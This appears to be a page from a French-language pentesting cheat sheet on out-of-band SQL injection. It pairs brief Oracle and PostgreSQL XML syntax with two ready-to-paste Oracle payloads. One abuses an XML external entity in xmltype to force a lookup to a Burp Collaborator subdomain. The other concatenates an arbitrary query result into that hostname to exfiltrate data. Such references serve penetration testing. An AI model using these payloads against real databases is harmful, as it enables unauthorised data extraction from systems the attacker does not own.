📤Out-Of-Band

Synthaxe XML integration

Oracle

SELECT XMLTYPE('<?xml version="1.0"?><document><employee>John</employee></document>') 
FROM dual;

PostgreSQL

SELECT XMLPARSE(DOCUMENT '<?xml version="1.0"?><document><employee>John</employee></document>');

Simple DNS lookup

' UNION SELECT EXTRACTVALUE(xmltype('<%3fxml+version%3d"1.0"+encoding%3d"UTF-8"%3f><!DOCTYPE+root+[+<!ENTITY+%25+remote+SYSTEM+"http%3a//BURP-COLLABORATOR-SUBDOMAIN/">+%25remote%3b]>'),'/l') FROM dual--

Data exfiltration

' UNION SELECT EXTRACTVALUE(xmltype('<%3fxml+version%3d"1.0"+encoding%3d"UTF-8"%3f><!DOCTYPE+root+[+<!ENTITY+%25+remote+SYSTEM+"http%3a//'||(<SQL_QUERY_HERE>)||'.BURP-COLLABORATOR-SUBDOMAIN/">+%25remote%3b]>'),'/l') FROM dual--

PrécédentBoolean based / Error Based SuivantCRLF

Dernière mise à jour il y a 1 an